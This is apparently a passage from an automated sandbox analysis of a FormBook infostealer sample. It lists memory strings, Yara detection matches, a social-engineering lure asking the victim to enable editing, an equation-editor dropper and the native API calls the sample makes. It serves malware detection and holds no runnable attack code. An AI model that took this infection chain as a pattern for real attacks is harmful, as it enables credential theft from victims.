Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&a=
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000007.00000000.2182495093.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.nifty.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 00000007.00000000.2181905555.00000000039F4000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000007.00000000.2191880997.000000000861C000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.recherche.aol.fr/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.target.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.walmart.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2182495093.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.yam.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&Version=2008-06-26&Operation
Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://z.about.com/m/a08.ico

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000008.00000002.2370481869.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2370639916.0000000000260000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2220114080.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2370580381.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2175872234.00000000036B9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2220171178.0000000000350000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2220222146.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000008.00000002.2370481869.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.2370481869.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.2370639916.0000000000260000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.2370639916.0000000000260000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.2220114080.0000000000190000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.2220114080.0000000000190000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.2370580381.00000000001A0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.2370580381.00000000001A0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.2175872234.00000000036B9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.2175872234.00000000036B9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.2220171178.0000000000350000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.2220171178.0000000000350000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.2220222146.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.2220222146.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Screenshot number: 4	Screenshot OCR: document is protected 16 17 18 19 20 Open the document in If thus document was 21 Mkrosoft Off
Source: Screenshot number: 4	Screenshot OCR: protected documents the yelkyw bar above 24 25 26 27 28 . 29 30 31 32 33 34 35 36 37

Office equation editor drops PE file

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\file2[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior

Source: C:\Users\Public\vbc.exe	Code function: 6_2_004181B0 NtCreateFile,	6_2_004181B0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00418260 NtReadFile,	6_2_00418260
Source: C:\Users\Public\vbc.exe	Code function: 6_2_004182E0 NtClose,	6_2_004182E0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00418390 NtAllocateVirtualMemory,	6_2_00418390
Source: C:\Users\Public\vbc.exe	Code function: 6_2_004181AA NtCreateFile,	6_2_004181AA
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0041825C NtReadFile,	6_2_0041825C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_004182DA NtClose,	6_2_004182DA
Source: C:\Users\Public\vbc.exe	Code function: 6_2_008500C4 NtCreateFile,LdrInitializeThunk,	6_2_008500C4
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00850048 NtProtectVirtualMemory,LdrInitializeThunk,	6_2_00850048
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00850078 NtResumeThread,LdrInitializeThunk,	6_2_00850078
Source: C:\Users\Public\vbc.exe	Code function: 6_2_008507AC NtCreateMutant,LdrInitializeThunk,	6_2_008507AC
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0084F9F0 NtClose,LdrInitializeThunk,	6_2_0084F9F0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0084F900 NtReadFile,LdrInitializeThunk,	6_2_0084F900
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0084FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,	6_2_0084FAD0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0084FAE8 NtQueryInformationProcess,LdrInitializeThunk,	6_2_0084FAE8
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0084FBB8 NtQueryInformationToken,LdrInitializeThunk,	6_2_0084FBB8
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0084FB68 NtFreeVirtualMemory,LdrInitializeThunk,	6_2_0084FB68
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0084FC90 NtUnmapViewOfSection,LdrInitializeThunk,	6_2_0084FC90
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0084FC60 NtMapViewOfSection,LdrInitializeThunk,	6_2_0084FC60
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0084FD8C NtDelayExecution,LdrInitializeThunk,	6_2_0084FD8C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0084FDC0 NtQuerySystemInformation,LdrInitializeThunk,	6_2_0084FDC0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0084FEA0 NtReadVirtualMemory,LdrInitializeThunk,	6_2_0084FEA0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0084FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,	6_2_0084FED0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0084FFB4 NtCreateSection,LdrInitializeThunk,	6_2_0084FFB4
Source: C:\Users\Public\vbc.exe	Code function: 6_2_008510D0 NtOpenProcessToken,	6_2_008510D0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00850060 NtQuerySection,	6_2_00850060
Source: C:\Users\Public\vbc.exe	Code function: 6_2_008501D4 NtSetValueKey,	6_2_008501D4
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0085010C NtOpenDirectoryObject,	6_2_0085010C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00851148 NtOpenThread,	6_2_00851148
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0084F8CC NtWaitForSingleObject,	6_2_0084F8CC
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00851930 NtSetContextThread,	6_2_00851930
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0084F938 NtWriteFile,	6_2_0084F938
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0084FAB8 NtQueryValueKey,	6_2_0084FAB8
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0084FA20 NtQueryInformationFile,	6_2_0084FA20
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0084FA50 NtEnumerateValueKey,	6_2_0084FA50
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0084FBE8 NtQueryVirtualMemory,	6_2_0084FBE8
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0084FB50 NtCreateKey,	6_2_0084FB50
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0084FC30 NtOpenProcess,	6_2_0084FC30
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00850C40 NtGetContextThread,	6_2_00850C40
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0084FC48 NtSetInformationFile,	6_2_0084FC48
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00851D80 NtSuspendThread,	6_2_00851D80
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0084FD5C NtEnumerateKey,	6_2_0084FD5C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0084FE24 NtWriteVirtualMemory,	6_2_0084FE24
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0084FFFC NtCreateProcessEx,	6_2_0084FFFC
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0084FF34 NtQueueApcThread,	6_2_0084FF34
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_025700C4 NtCreateFile,LdrInitializeThunk,	8_2_025700C4
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_025707AC NtCreateMutant,LdrInitializeThunk,	8_2_025707AC
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_0256FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,	8_2_0256FAD0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_0256FAE8 NtQueryInformationProcess,LdrInitializeThunk,	8_2_0256FAE8
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_0256FAB8 NtQueryValueKey,LdrInitializeThunk,	8_2_0256FAB8
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_0256FB50 NtCreateKey,LdrInitializeThunk,	8_2_0256FB50
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_0256FB68 NtFreeVirtualMemory,LdrInitializeThunk,	8_2_0256FB68
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_0256FBB8 NtQueryInformationToken,LdrInitializeThunk,	8_2_0256FBB8
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_0256F900 NtReadFile,LdrInitializeThunk,	8_2_0256F900
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_0256F9F0 NtClose,LdrInitializeThunk,	8_2_0256F9F0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_0256FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,	8_2_0256FED0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_0256FFB4 NtCreateSection,LdrInitializeThunk,	8_2_0256FFB4
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_0256FC60 NtMapViewOfSection,LdrInitializeThunk,	8_2_0256FC60
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_0256FDC0 NtQuerySystemInformation,LdrInitializeThunk,	8_2_0256FDC0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_0256FD8C NtDelayExecution,LdrInitializeThunk,	8_2_0256FD8C
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_02570048 NtProtectVirtualMemory,	8_2_02570048
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_02570078 NtResumeThread,	8_2_02570078
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_02570060 NtQuerySection,	8_2_02570060
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_025710D0 NtOpenProcessToken,	8_2_025710D0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_02571148 NtOpenThread,	8_2_02571148
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_0257010C NtOpenDirectoryObject,	8_2_0257010C
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_025701D4 NtSetValueKey,	8_2_025701D4
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_0256FA50 NtEnumerateValueKey,	8_2_0256FA50
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_0256FA20 NtQueryInformationFile,	8_2_0256FA20
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_0256FBE8 NtQueryVirtualMemory,	8_2_0256FBE8
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_0256F8CC NtWaitForSingleObject,	8_2_0256F8CC
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_02571930 NtSetContextThread,	8_2_02571930
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_0256F938 NtWriteFile,	8_2_0256F938
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_0256FE24 NtWriteVirtualMemory,	8_2_0256FE24
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_0256FEA0 NtReadVirtualMemory,	8_2_0256FEA0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_0256FF34 NtQueueApcThread,	8_2_0256FF34
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_0256FFFC NtCreateProcessEx,	8_2_0256FFFC
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_02570C40 NtGetContextThread,	8_2_02570C40
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_0256FC48 NtSetInformationFile,	8_2_0256FC48
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_0256FC30 NtOpenProcess,	8_2_0256FC30
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_0256FC90 NtUnmapViewOfSection,	8_2_0256FC90
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_0256FD5C NtEnumerateKey,	8_2_0256FD5C
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_02571D80 NtSuspendThread,	8_2_02571D80
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_000981B0 NtCreateFile,	8_2_000981B0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_00098260 NtReadFile,	8_2_00098260
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_000982E0 NtClose,	8_2_000982E0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_00098390 NtAllocateVirtualMemory,	8_2_00098390
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_000981AA NtCreateFile,	8_2_000981AA
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_0009825C NtReadFile,	8_2_0009825C
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_000982DA NtClose,	8_2_000982DA

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00363670	4_2_00363670
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00363AF8	4_2_00363AF8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00363E48	4_2_00363E48
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00368750	4_2_00368750
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00368740	4_2_00368740
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00368998	4_2_00368998
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00363AE8	4_2_00363AE8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_011D5148	4_2_011D5148
Source: C:\Users\Public\vbc.exe	Code function: 5_2_011D5148	5_2_011D5148
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0040102F	6_2_0040102F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00401030	6_2_00401030
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00408C4C	6_2_00408C4C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00408C50	6_2_00408C50
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0041B493	6_2_0041B493
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0041CD28	6_2_0041CD28
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00402D87	6_2_00402D87
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00402D90	6_2_00402D90
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0041CE77	6_2_0041CE77
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00402FB0	6_2_00402FB0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0085E0C6	6_2_0085E0C6
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0088D005	6_2_0088D005
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00863040	6_2_00863040
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0087905A	6_2_0087905A
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0085E2E9	6_2_0085E2E9
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00901238	6_2_00901238
Source: C:\Users\Public\vbc.exe	Code function: 6_2_009063BF	6_2_009063BF
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0085F3CF	6_2_0085F3CF
Source: C:\Users\Public\vbc.exe	Code function: 6_2_008863DB	6_2_008863DB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00862305	6_2_00862305
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00867353	6_2_00867353
Source: C:\Users\Public\vbc.exe	Code function: 6_2_008AA37B	6_2_008AA37B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00895485	6_2_00895485
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00871489	6_2_00871489
Source: C:\Users\Public\vbc.exe	Code function: 6_2_008E443E	6_2_008E443E
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0089D47D	6_2_0089D47D
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0087C5F0	6_2_0087C5F0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0086351F	6_2_0086351F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_008A6540	6_2_008A6540
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00864680	6_2_00864680
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0086E6C1	6_2_0086E6C1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00902622	6_2_00902622
Source: C:\Users\Public\vbc.exe	Code function: 6_2_008AA634	6_2_008AA634
Source: C:\Users\Public\vbc.exe	Code function: 6_2_008E579A	6_2_008E579A
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0086C7BC	6_2_0086C7BC
Source: C:\Users\Public\vbc.exe	Code function: 6_2_008957C3	6_2_008957C3
Source: C:\Users\Public\vbc.exe	Code function: 6_2_008FF8EE	6_2_008FF8EE
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0086C85C	6_2_0086C85C
